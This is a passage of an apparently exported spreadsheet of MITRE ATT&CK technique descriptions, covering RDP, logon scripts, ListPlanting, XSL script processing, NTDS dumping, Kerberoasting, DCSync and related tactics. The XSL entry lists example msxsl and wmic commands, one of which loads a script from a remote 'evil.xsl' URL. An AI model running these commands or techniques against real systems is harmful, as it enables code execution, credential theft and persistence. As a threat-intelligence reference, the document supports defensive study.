Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).(Citation: TechNet Remote Desktop Services) 
Adversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials. Adversaries will likely use Credential Access techniques to acquire credentials to use with RDP. Adversaries may also use RDP in conjunction with the [Accessibility Features](https://attack.mitre.org/techniques/T1546/008) or [Terminal Services DLL](https://attack.mitre.org/techniques/T1505/005) for Persistence.(Citation: Alperovitch Malware)
https://attack.mitre.org/techniques/T1021/001</t>
  </si>
  <si>
    <t>T1037.001</t>
  </si>
  <si>
    <t>Logon Script (Windows)</t>
  </si>
  <si>
    <t>Adversaries may use Windows logon scripts automatically executed at logon initialization to establish persistence. Windows allows logon scripts to be run whenever a specific user or group of users log into a system.(Citation: TechNet Logon Scripts) This is done via adding a path to a script to the &lt;code&gt;HKCU\Environment\UserInitMprLogonScript&lt;/code&gt; Registry key.(Citation: Hexacorn Logon Scripts)
Adversaries may use these scripts to maintain persistence on a single system. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary.
https://attack.mitre.org/techniques/T1037/001</t>
  </si>
  <si>
    <t>T1055.015</t>
  </si>
  <si>
    <t>ListPlanting</t>
  </si>
  <si>
    <t>Adversaries may abuse list-view controls to inject malicious code into hijacked processes in order to evade process-based defenses as well as possibly elevate privileges. ListPlanting is a method of executing arbitrary code in the address space of a separate live process.(Citation: Hexacorn Listplanting) Code executed via ListPlanting may also evade detection from security products since the execution is masked under a legitimate process.
List-view controls are user interface windows used to display collections of items.(Citation: Microsoft List View Controls) Information about an application's list-view settings are stored within the process' memory in a &lt;code&gt;SysListView32&lt;/code&gt; control.
ListPlanting (a form of message-passing "shatter attack") may be performed by copying code into the virtual address space of a process that uses a list-view control then using that code as a custom callback for sorting the listed items.(Citation: Modexp Windows Process Injection) Adversaries must first copy code into the target process’ memory space, which can be performed various ways including by directly obtaining a handle to the &lt;code&gt;SysListView32&lt;/code&gt; child of the victim process window (via Windows API calls such as &lt;code&gt;FindWindow&lt;/code&gt; and/or &lt;code&gt;EnumWindows&lt;/code&gt;) or other [Process Injection](https://attack.mitre.org/techniques/T1055) methods.
Some variations of ListPlanting may allocate memory in the target process but then use window messages to copy the payload, to avoid the use of the highly monitored &lt;code&gt;WriteProcessMemory&lt;/code&gt; function. For example, an adversary can use the &lt;code&gt;PostMessage&lt;/code&gt; and/or &lt;code&gt;SendMessage&lt;/code&gt; API functions to send &lt;code&gt;LVM_SETITEMPOSITION&lt;/code&gt; and &lt;code&gt;LVM_GETITEMPOSITION&lt;/code&gt; messages, effectively copying a payload 2 bytes at a time to the allocated memory.(Citation: ESET InvisiMole June 2020) 
Finally, the payload is triggered by sending the &lt;code&gt;LVM_SORTITEMS&lt;/code&gt; message to the &lt;code&gt;SysListView32&lt;/code&gt; child of the process window, with the payload within the newly allocated buffer passed and executed as the &lt;code&gt;ListView_SortItems&lt;/code&gt; callback.
https://attack.mitre.org/techniques/T1055/015</t>
  </si>
  <si>
    <t>T1665</t>
  </si>
  <si>
    <t>Hide Infrastructure</t>
  </si>
  <si>
    <t>Adversaries may manipulate network traffic in order to hide and evade detection of their C2 infrastructure. This can be accomplished in various ways including by identifying and filtering traffic from defensive tools,(Citation: TA571) masking malicious domains to obfuscate the true destination from both automated scanning tools and security researchers,(Citation: Schema-abuse)(Citation: Facad1ng)(Citation: Browser-updates) and otherwise hiding malicious artifacts to delay discovery and prolong the effectiveness of adversary infrastructure that could otherwise be identified, blocked, or taken down entirely.
C2 networks may include the use of [Proxy](https://attack.mitre.org/techniques/T1090) or VPNs to disguise IP addresses, which can allow adversaries to blend in with normal network traffic and bypass conditional access policies or anti-abuse protections. For example, an adversary may use a virtual private cloud to spoof their IP address to closer align with a victim's IP address ranges. This may also bypass security measures relying on geolocation of the source IP address.(Citation: sysdig)(Citation: Orange Residential Proxies)
Adversaries may also attempt to filter network traffic in order to evade defensive tools in numerous ways, including blocking/redirecting common incident responder or security appliance user agents.(Citation: mod_rewrite)(Citation: SocGholish-update) Filtering traffic based on IP and geo-fencing may also avoid automated sandboxing or researcher activity (i.e., [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497)).(Citation: TA571)(Citation: mod_rewrite)
Hiding C2 infrastructure may also be supported by [Resource Development](https://attack.mitre.org/tactics/TA0042) activities such as [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) and [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584). For example, using widely trusted hosting services or domains such as prominent URL shortening providers or marketing services for C2 networks may enable adversaries to present benign content that later redirects victims to malicious web pages or infrastructure once specific conditions are met.(Citation: StarBlizzard)(Citation: QR-cofense)
https://attack.mitre.org/techniques/T1665</t>
  </si>
  <si>
    <t>T1484</t>
  </si>
  <si>
    <t>Domain or Tenant Policy Modification</t>
  </si>
  <si>
    <t>Adversaries may modify the configuration settings of a domain or identity tenant to evade defenses and/or escalate privileges in centrally managed environments. Such services provide a centralized means of managing identity resources such as devices and accounts, and often include configuration settings that may apply between domains or tenants such as trust relationships, identity syncing, or identity federation.
Modifications to domain or tenant settings may include altering domain Group Policy Objects (GPOs) in Microsoft Active Directory (AD) or changing trust settings for domains, including federation trusts relationships between domains or tenants.
With sufficient permissions, adversaries can modify domain or tenant policy settings. Since configuration settings for these services apply to a large number of identity resources, there are a great number of potential attacks malicious outcomes that can stem from this abuse. Examples of such abuse include:  
* modifying GPOs to push a malicious [Scheduled Task](https://attack.mitre.org/techniques/T1053/005) to computers throughout the domain environment(Citation: ADSecurity GPO Persistence 2016)(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions)
* modifying domain trusts to include an adversary-controlled domain, allowing adversaries to  forge access tokens that will subsequently be accepted by victim domain resources(Citation: Microsoft - Customer Guidance on Recent Nation-State Cyber Attacks)
* changing configuration settings within the AD environment to implement a [Rogue Domain Controller](https://attack.mitre.org/techniques/T1207).
* adding new, adversary-controlled federated identity providers to identity tenants, allowing adversaries to authenticate as any user managed by the victim tenant (Citation: Okta Cross-Tenant Impersonation 2023)
Adversaries may temporarily modify domain or tenant policy, carry out a malicious action(s), and then revert the change to remove suspicious indicators.
https://attack.mitre.org/techniques/T1484</t>
  </si>
  <si>
    <t>T1220</t>
  </si>
  <si>
    <t>XSL Script Processing</t>
  </si>
  <si>
    <t>Adversaries may bypass application control and obscure execution of code by embedding scripts inside XSL files. Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. To support complex operations, the XSL standard includes support for embedded scripting in various languages. (Citation: Microsoft XSLT Script Mar 2017)
Adversaries may abuse this functionality to execute arbitrary files while potentially bypassing application control. Similar to [Trusted Developer Utilities Proxy Execution](https://attack.mitre.org/techniques/T1127), the Microsoft common line transformation utility binary (msxsl.exe) (Citation: Microsoft msxsl.exe) can be installed and used to execute malicious JavaScript embedded within local or remote (URL referenced) XSL files. (Citation: Penetration Testing Lab MSXSL July 2017) Since msxsl.exe is not installed by default, an adversary will likely need to package it with dropped files. (Citation: Reaqta MSXSL Spearphishing MAR 2018) Msxsl.exe takes two main arguments, an XML source file and an XSL stylesheet. Since the XSL file is valid XML, the adversary may call the same XSL file twice. When using msxsl.exe adversaries may also give the XML/XSL files an arbitrary file extension.(Citation: XSL Bypass Mar 2019)
Command-line examples:(Citation: Penetration Testing Lab MSXSL July 2017)(Citation: XSL Bypass Mar 2019)
* &lt;code&gt;msxsl.exe customers[.]xml script[.]xsl&lt;/code&gt;
* &lt;code&gt;msxsl.exe script[.]xsl script[.]xsl&lt;/code&gt;
* &lt;code&gt;msxsl.exe script[.]jpeg script[.]jpeg&lt;/code&gt;
Another variation of this technique, dubbed “Squiblytwo”, involves using [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) to invoke JScript or VBScript within an XSL file.(Citation: LOLBAS Wmic) This technique can also execute local/remote scripts and, similar to its [Regsvr32](https://attack.mitre.org/techniques/T1218/010)/ "Squiblydoo" counterpart, leverages a trusted, built-in Windows tool. Adversaries may abuse any alias in [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) provided they utilize the /FORMAT switch.(Citation: XSL Bypass Mar 2019)
Command-line examples:(Citation: XSL Bypass Mar 2019)(Citation: LOLBAS Wmic)
* Local File: &lt;code&gt;wmic process list /FORMAT:evil[.]xsl&lt;/code&gt;
* Remote File: &lt;code&gt;wmic os get /FORMAT:”https[:]//example[.]com/evil[.]xsl”&lt;/code&gt;
https://attack.mitre.org/techniques/T1220</t>
  </si>
  <si>
    <t>T1596.005</t>
  </si>
  <si>
    <t>Scan Databases</t>
  </si>
  <si>
    <t>Adversaries may search within public scan databases for information about victims that can be used during targeting. Various online services continuously publish the results of Internet scans/surveys, often harvesting information such as active IP addresses, hostnames, open ports, certificates, and even server banners.(Citation: Shodan)
Adversaries may search scan databases to gather actionable information. Threat actors can use online resources and lookup tools to harvest information from these services. Adversaries may seek information about their already identified targets, or use these datasets to discover opportunities for successful breaches. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)).
https://attack.mitre.org/techniques/T1596/005</t>
  </si>
  <si>
    <t>T1564.001</t>
  </si>
  <si>
    <t>Hidden Files and Directories</t>
  </si>
  <si>
    <t>Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches (&lt;code&gt;dir /a&lt;/code&gt; for Windows and &lt;code&gt;ls –a&lt;/code&gt; for Linux and macOS).
On Linux and Mac, users can mark specific files as hidden simply by putting a “.” as the first character in the file or folder name  (Citation: Sofacy Komplex Trojan) (Citation: Antiquated Mac Malware). Files and folders that start with a period, ‘.’, are by default hidden from being viewed in the Finder application and standard command-line utilities like “ls”. Users must specifically change settings to have these files viewable.
Files on macOS can also be marked with the UF_HIDDEN flag which prevents them from being seen in Finder.app, but still allows them to be seen in Terminal.app (Citation: WireLurker). On Windows, users can mark specific files as hidden by using the attrib.exe binary. Many applications create these hidden files and folders to store information so that it doesn’t clutter up the user’s workspace. For example, SSH utilities create a .ssh folder that’s hidden and contains the user’s known hosts and keys.
Adversaries can use this to their advantage to hide files and folders anywhere on the system and evading a typical user or system analysis that does not incorporate investigation of hidden files.
https://attack.mitre.org/techniques/T1564/001</t>
  </si>
  <si>
    <t>T1578.001</t>
  </si>
  <si>
    <t>Create Snapshot</t>
  </si>
  <si>
    <t>An adversary may create a snapshot or data backup within a cloud account to evade defenses. A snapshot is a point-in-time copy of an existing cloud compute component such as a virtual machine (VM), virtual hard drive, or volume. An adversary may leverage permissions to create a snapshot in order to bypass restrictions that prevent access to existing compute service infrastructure, unlike in [Revert Cloud Instance](https://attack.mitre.org/techniques/T1578/004) where an adversary may revert to a snapshot to evade detection and remove evidence of their presence.
An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002), mount one or more created snapshots to that instance, and then apply a policy that allows the adversary access to the created instance, such as a firewall policy that allows them inbound and outbound SSH access.(Citation: Mandiant M-Trends 2020)
https://attack.mitre.org/techniques/T1578/001</t>
  </si>
  <si>
    <t>T1591.001</t>
  </si>
  <si>
    <t>Determine Physical Locations</t>
  </si>
  <si>
    <t>Adversaries may gather the victim's physical location(s) that can be used during targeting. Information about physical locations of a target organization may include a variety of details, including where key resources and infrastructure are housed. Physical locations may also indicate what legal jurisdiction and/or authorities the victim operates within.
Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Physical locations of a target organization may also be exposed to adversaries via online or other accessible data sets (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594) or [Social Media](https://attack.mitre.org/techniques/T1593/001)).(Citation: ThreatPost Broadvoice Leak)(Citation: SEC EDGAR Search) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Hardware Additions](https://attack.mitre.org/techniques/T1200)).
https://attack.mitre.org/techniques/T1591/001</t>
  </si>
  <si>
    <t>T1137.002</t>
  </si>
  <si>
    <t>Office Test</t>
  </si>
  <si>
    <t>Adversaries may abuse the Microsoft Office "Office Test" Registry key to obtain persistence on a compromised system. An Office Test Registry location exists that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started. This Registry key is thought to be used by Microsoft to load DLLs for testing and debugging purposes while developing Office applications. This Registry key is not created by default during an Office installation.(Citation: Hexacorn Office Test)(Citation: Palo Alto Office Test Sofacy)
There exist user and global Registry keys for the Office Test feature, such as:
* &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf&lt;/code&gt;
* &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Office test\Special\Perf&lt;/code&gt;
Adversaries may add this Registry key and specify a malicious DLL that will be executed whenever an Office application, such as Word or Excel, is started.
https://attack.mitre.org/techniques/T1137/002</t>
  </si>
  <si>
    <t>T1587</t>
  </si>
  <si>
    <t>Develop Capabilities</t>
  </si>
  <si>
    <t>Adversaries may build capabilities that can be used during targeting. Rather than purchasing, freely downloading, or stealing capabilities, adversaries may develop their own capabilities in-house. This is the process of identifying development requirements and building solutions such as malware, exploits, and self-signed certificates. Adversaries may develop capabilities to support their operations throughout numerous phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: Bitdefender StrongPity June 2020)(Citation: Talos Promethium June 2020)
As with legitimate development efforts, different skill sets may be required for developing capabilities. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's development capabilities, provided the adversary plays a role in shaping requirements and maintains a degree of exclusivity to the capability.
https://attack.mitre.org/techniques/T1587</t>
  </si>
  <si>
    <t>T1003.003</t>
  </si>
  <si>
    <t>NTDS</t>
  </si>
  <si>
    <t>Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights. By default, the NTDS file (NTDS.dit) is located in &lt;code&gt;%SystemRoot%\NTDS\Ntds.dit&lt;/code&gt; of a domain controller.(Citation: Wikipedia Active Directory)
In addition to looking for NTDS files on active Domain Controllers, adversaries may search for backups that contain the same or similar information.(Citation: Metcalf 2015)
The following tools and techniques can be used to enumerate the NTDS file and the contents of the entire Active Directory hashes.
* Volume Shadow Copy
* secretsdump.py
* Using the in-built Windows tool, ntdsutil.exe
* Invoke-NinjaCopy
https://attack.mitre.org/techniques/T1003/003</t>
  </si>
  <si>
    <t>T1602.001</t>
  </si>
  <si>
    <t>SNMP (MIB Dump)</t>
  </si>
  <si>
    <t>Adversaries may target the Management Information Base (MIB) to collect and/or mine valuable information in a network managed using Simple Network Management Protocol (SNMP).
The MIB is a configuration repository that stores variable information accessible via SNMP in the form of object identifiers (OID). Each OID identifies a variable that can be read or set and permits active management tasks, such as configuration changes, through remote modification of these variables. SNMP can give administrators great insight in their systems, such as, system information, description of hardware, physical location, and software packages(Citation: SANS Information Security Reading Room Securing SNMP Securing SNMP). The MIB may also contain device operational information, including running configuration, routing table, and interface details.
Adversaries may use SNMP queries to collect MIB content directly from SNMP-managed devices in order to collect network information that allows the adversary to build network maps and facilitate future targeted exploitation.(Citation: US-CERT-TA18-106A)(Citation: Cisco Blog Legacy Device Attacks)
https://attack.mitre.org/techniques/T1602/001</t>
  </si>
  <si>
    <t>T1001.002</t>
  </si>
  <si>
    <t>Adversaries may use steganographic techniques to hide command and control traffic to make detection efforts more difficult. Steganographic techniques can be used to hide data in digital messages that are transferred between systems. This hidden information can be used for command and control of compromised systems. In some cases, the passing of files embedded using steganography, such as image or document files, can be used for command and control.
https://attack.mitre.org/techniques/T1001/002</t>
  </si>
  <si>
    <t>T1204.001</t>
  </si>
  <si>
    <t>Malicious Link</t>
  </si>
  <si>
    <t>An adversary may rely upon a user clicking a malicious link in order to gain execution. Users may be subjected to social engineering to get them to click on a link that will lead to code execution. This user action will typically be observed as follow-on behavior from [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002). Clicking on a link may also lead to other execution techniques such as exploitation of a browser or application vulnerability via [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203). Links may also lead users to download files that require execution via [Malicious File](https://attack.mitre.org/techniques/T1204/002).
https://attack.mitre.org/techniques/T1204/001</t>
  </si>
  <si>
    <t>T1550.001</t>
  </si>
  <si>
    <t>Application Access Token</t>
  </si>
  <si>
    <t>Adversaries may use stolen application access tokens to bypass the typical authentication process and access restricted accounts, information, or services on remote systems. These tokens are typically stolen from users or services and used in lieu of login credentials.
Application access tokens are used to make authorized API requests on behalf of a user or service and are commonly used to access resources in cloud, container-based applications, and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019) 
OAuth is one commonly implemented framework that issues tokens to users for access to systems. These frameworks are used collaboratively to verify the user and determine what actions the user is allowed to perform. Once identity is established, the token allows actions to be authorized, without passing the actual credentials of the user. Therefore, compromise of the token can grant the adversary access to resources of other sites through a malicious application.(Citation: okta)
For example, with a cloud-based email service, once an OAuth access token is granted to a malicious application, it can potentially gain long-term access to features of the user account if a "refresh" token enabling background access is awarded.(Citation: Microsoft Identity Platform Access 2019) With an OAuth access token an adversary can use the user-granted REST API to perform functions such as email searching and contact enumeration.(Citation: Staaldraad Phishing with OAuth 2017)
Compromised access tokens may be used as an initial step in compromising other services. For example, if a token grants access to a victim’s primary email, the adversary may be able to extend access to all other services which the target subscribes by triggering forgotten password routines. In AWS and GCP environments, adversaries can trigger a request for a short-lived access token with the privileges of another user account.(Citation: Google Cloud Service Account Credentials)(Citation: AWS Temporary Security Credentials) The adversary can then use this token to request data or perform actions the original account could not. If permissions for this feature are misconfigured – for example, by allowing all users to request a token for a particular account - an adversary may be able to gain initial access to a Cloud Account or escalate their privileges.(Citation: Rhino Security Labs Enumerating AWS Roles)
Direct API access through a token negates the effectiveness of a second authentication factor and may be immune to intuitive countermeasures like changing passwords.  For example, in AWS environments, an adversary who compromises a user’s AWS API credentials may be able to use the `sts:GetFederationToken` API call to create a federated user session, which will have the same permissions as the original user but may persist even if the original user credentials are deactivated.(Citation: Crowdstrike AWS User Federation Persistence) Additionally, access abuse over an API channel can be difficult to detect even from the service provider end, as the access can still align well with a legitimate workflow.
https://attack.mitre.org/techniques/T1550/001</t>
  </si>
  <si>
    <t>T1547.008</t>
  </si>
  <si>
    <t>LSASS Driver</t>
  </si>
  <si>
    <t>Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.(Citation: Microsoft Security Subsystem)
Adversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574)), an adversary can use LSA operations to continuously execute malicious payloads.
https://attack.mitre.org/techniques/T1547/008</t>
  </si>
  <si>
    <t>T1569.002</t>
  </si>
  <si>
    <t>Service Execution</t>
  </si>
  <si>
    <t>Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager (&lt;code&gt;services.exe&lt;/code&gt;) is an interface to manage and manipulate services.(Citation: Microsoft Service Control Manager) The service control manager is accessible to users via GUI components as well as system utilities such as &lt;code&gt;sc.exe&lt;/code&gt; and [Net](https://attack.mitre.org/software/S0039).
[PsExec](https://attack.mitre.org/software/S0029) can also be used to execute commands or payloads via a temporary Windows service created through the service control manager API.(Citation: Russinovich Sysinternals) Tools such as [PsExec](https://attack.mitre.org/software/S0029) and &lt;code&gt;sc.exe&lt;/code&gt; can accept remote servers as arguments and may be used to conduct remote execution.
Adversaries may leverage these mechanisms to execute malicious content. This can be done by either executing a new or modified service. This technique is the execution used in conjunction with [Windows Service](https://attack.mitre.org/techniques/T1543/003) during service persistence or privilege escalation.
https://attack.mitre.org/techniques/T1569/002</t>
  </si>
  <si>
    <t>T1078.004</t>
  </si>
  <si>
    <t>Valid accounts in cloud environments may allow adversaries to perform actions to achieve Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. Cloud Accounts can exist solely in the cloud; alternatively, they may be hybrid-joined between on-premises systems and the cloud through syncing or federation with other identity sources such as Windows Active Directory. (Citation: AWS Identity Federation)(Citation: Google Federating GC)(Citation: Microsoft Deploying AD Federation)
Service or user accounts may be targeted by adversaries through [Brute Force](https://attack.mitre.org/techniques/T1110), [Phishing](https://attack.mitre.org/techniques/T1566), or various other means to gain access to the environment. Federated or synced accounts may be a pathway for the adversary to affect both on-premises systems and cloud environments - for example, by leveraging shared credentials to log onto [Remote Services](https://attack.mitre.org/techniques/T1021). High privileged cloud accounts, whether federated, synced, or cloud-only, may also allow pivoting to on-premises environments by leveraging SaaS-based [Software Deployment Tools](https://attack.mitre.org/techniques/T1072) to run commands on hybrid-joined devices.
An adversary may create long lasting [Additional Cloud Credentials](https://attack.mitre.org/techniques/T1098/001) on a compromised cloud account to maintain persistence in the environment. Such credentials may also be used to bypass security controls such as multi-factor authentication. 
Cloud accounts may also be able to assume [Temporary Elevated Cloud Access](https://attack.mitre.org/techniques/T1548/005) or other privileges through various means within the environment. Misconfigurations in role assignments or role assumption policies may allow an adversary to use these mechanisms to leverage permissions outside the intended scope of the account. Such over privileged accounts may be used to harvest sensitive data from online storage accounts and databases through [Cloud API](https://attack.mitre.org/techniques/T1059/009) or other methods.
https://attack.mitre.org/techniques/T1078/004</t>
  </si>
  <si>
    <t>T1480.001</t>
  </si>
  <si>
    <t>Environmental Keying</t>
  </si>
  <si>
    <t>Adversaries may environmentally key payloads or other features of malware to evade defenses and constraint execution to a specific target environment. Environmental keying uses cryptography to constrain execution or actions based on adversary supplied environment specific conditions that are expected to be present on the target. Environmental keying is an implementation of [Execution Guardrails](https://attack.mitre.org/techniques/T1480) that utilizes cryptographic techniques for deriving encryption/decryption keys from specific types of values in a given computing environment.(Citation: EK Clueless Agents)
Values can be derived from target-specific elements and used to generate a decryption key for an encrypted payload. Target-specific values can be derived from specific network shares, physical devices, software/software versions, files, joined AD domains, system time, and local/external IP addresses.(Citation: Kaspersky Gauss Whitepaper)(Citation: Proofpoint Router Malvertising)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware) By generating the decryption keys from target-specific environmental values, environmental keying can make sandbox detection, anti-virus detection, crowdsourcing of information, and reverse engineering difficult.(Citation: Kaspersky Gauss Whitepaper)(Citation: Ebowla: Genetic Malware) These difficulties can slow down the incident response process and help adversaries hide their tactics, techniques, and procedures (TTPs).
Similar to [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027), adversaries may use environmental keying to help protect their TTPs and evade detection. Environmental keying may be used to deliver an encrypted payload to the target that will use target-specific values to decrypt the payload before execution.(Citation: Kaspersky Gauss Whitepaper)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware)(Citation: Demiguise Guardrail Router Logo) By utilizing target-specific values to decrypt the payload the adversary can avoid packaging the decryption key with the payload or sending it over a potentially monitored network connection. Depending on the technique for gathering target-specific values, reverse engineering of the encrypted payload can be exceptionally difficult.(Citation: Kaspersky Gauss Whitepaper) This can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within.
Like other [Execution Guardrails](https://attack.mitre.org/techniques/T1480), environmental keying can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This activity is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of environmental keying will involve checking for an expected target-specific value that must match for decryption and subsequent execution to be successful.
https://attack.mitre.org/techniques/T1480/001</t>
  </si>
  <si>
    <t>T1008</t>
  </si>
  <si>
    <t>Fallback Channels</t>
  </si>
  <si>
    <t>Adversaries may use fallback or alternate communication channels if the primary channel is compromised or inaccessible in order to maintain reliable command and control and to avoid data transfer thresholds.
https://attack.mitre.org/techniques/T1008</t>
  </si>
  <si>
    <t>T1564.004</t>
  </si>
  <si>
    <t>NTFS File Attributes</t>
  </si>
  <si>
    <t>Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection. Every New Technology File System (NTFS) formatted partition contains a Master File Table (MFT) that maintains a record for every file/directory on the partition. (Citation: SpectorOps Host-Based Jul 2017) Within MFT entries are file attributes, (Citation: Microsoft NTFS File Attributes Aug 2010) such as Extended Attributes (EA) and Data [known as Alternate Data Streams (ADSs) when more than one Data attribute is present], that can be used to store arbitrary data (and even complete files). (Citation: SpectorOps Host-Based Jul 2017) (Citation: Microsoft File Streams) (Citation: MalwareBytes ADS July 2015) (Citation: Microsoft ADS Mar 2014)
Adversaries may store malicious data or binaries in file attribute metadata instead of directly in files. This may be done to evade some defenses, such as static indicator scanning tools and anti-virus. (Citation: Journey into IR ZeroAccess NTFS EA) (Citation: MalwareBytes ADS July 2015)
https://attack.mitre.org/techniques/T1564/004</t>
  </si>
  <si>
    <t>T1558.003</t>
  </si>
  <si>
    <t>Kerberoasting</t>
  </si>
  <si>
    <t>Adversaries may abuse a valid Kerberos ticket-granting ticket (TGT) or sniff network traffic to obtain a ticket-granting service (TGS) ticket that may be vulnerable to [Brute Force](https://attack.mitre.org/techniques/T1110).(Citation: Empire InvokeKerberoast Oct 2016)(Citation: AdSecurity Cracking Kerberos Dec 2015) 
Service principal names (SPNs) are used to uniquely identify each instance of a Windows service. To enable authentication, Kerberos requires that SPNs be associated with at least one service logon account (an account specifically tasked with running a service(Citation: Microsoft Detecting Kerberoasting Feb 2018)).(Citation: Microsoft SPN)(Citation: Microsoft SetSPN)(Citation: SANS Attacking Kerberos Nov 2014)(Citation: Harmj0y Kerberoast Nov 2016)
Adversaries possessing a valid Kerberos ticket-granting ticket (TGT) may request one or more Kerberos ticket-granting service (TGS) service tickets for any SPN from a domain controller (DC).(Citation: Empire InvokeKerberoast Oct 2016)(Citation: AdSecurity Cracking Kerberos Dec 2015) Portions of these tickets may be encrypted with the RC4 algorithm, meaning the Kerberos 5 TGS-REP etype 23 hash of the service account associated with the SPN is used as the private key and is thus vulnerable to offline [Brute Force](https://attack.mitre.org/techniques/T1110) attacks that may expose plaintext credentials.(Citation: AdSecurity Cracking Kerberos Dec 2015)(Citation: Empire InvokeKerberoast Oct 2016) (Citation: Harmj0y Kerberoast Nov 2016)
This same behavior could be executed using service tickets captured from network traffic.(Citation: AdSecurity Cracking Kerberos Dec 2015)
Cracked hashes may enable [Persistence](https://attack.mitre.org/tactics/TA0003), [Privilege Escalation](https://attack.mitre.org/tactics/TA0004), and [Lateral Movement](https://attack.mitre.org/tactics/TA0008) via access to [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: SANS Attacking Kerberos Nov 2014)
https://attack.mitre.org/techniques/T1558/003</t>
  </si>
  <si>
    <t>T1003.006</t>
  </si>
  <si>
    <t>DCSync</t>
  </si>
  <si>
    <t>Adversaries may attempt to access credentials and other sensitive information by abusing a Windows Domain Controller's application programming interface (API)(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) (Citation: Wine API samlib.dll) to simulate the replication process from a remote domain controller using a technique called DCSync.
Members of the Administrators, Domain Admins, and Enterprise Admin groups or computer accounts on the domain controller are able to run DCSync to pull password data(Citation: ADSecurity Mimikatz DCSync) from Active Directory, which may include current and historical hashes of potentially useful accounts such as KRBTGT and Administrators. The hashes can then in turn be used to create a [Golden Ticket](https://attack.mitre.org/techniques/T1558/001) for use in [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003)(Citation: Harmj0y Mimikatz and DCSync) or change an account's password as noted in [Account Manipulation](https://attack.mitre.org/techniques/T1098).(Citation: InsiderThreat ChangeNTLM July 2017)
DCSync functionality has been included in the "lsadump" module in [Mimikatz](https://attack.mitre.org/software/S0002).(Citation: GitHub Mimikatz lsadump Module) Lsadump also includes NetSync, which performs DCSync over a legacy replication protocol.(Citation: Microsoft NRPC Dec 2017)
https://attack.mitre.org/techniques/T1003/006</t>
  </si>
  <si>
    <t>T1124</t>
  </si>
  <si>
    <t>System Time Discovery</t>
  </si>
  <si>
    <t>An adversary may gather the system time and/or time zone settings from a local or remote system. The system time is set and stored by services, such as the Windows Time Service on Windows or &lt;code&gt;systemsetup&lt;/code&gt; on macOS.(Citation: MSDN System Time)(Citation: Technet Windows Time Service)(Citation: systemsetup mac time) These time settings may also be synchronized between systems and services in an enterprise network, typically accomplished with a network time server within a domain.(Citation: Mac Time Sync)(Citation: linux system time)
